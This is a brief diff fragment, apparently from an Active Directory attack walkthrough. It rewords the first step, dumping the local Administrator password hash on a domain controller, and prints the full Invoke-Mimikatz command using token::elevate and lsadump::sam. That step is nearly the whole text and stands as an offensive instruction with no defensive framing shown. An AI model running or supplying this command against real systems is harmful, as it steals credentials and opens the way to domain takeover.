 Skip to content

-1. Use Mimikatz to dump the hash of the local Administrator account on the DC.
+1. Dump the hash of the local Administrator account on the DC using Mimikatz:

 Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'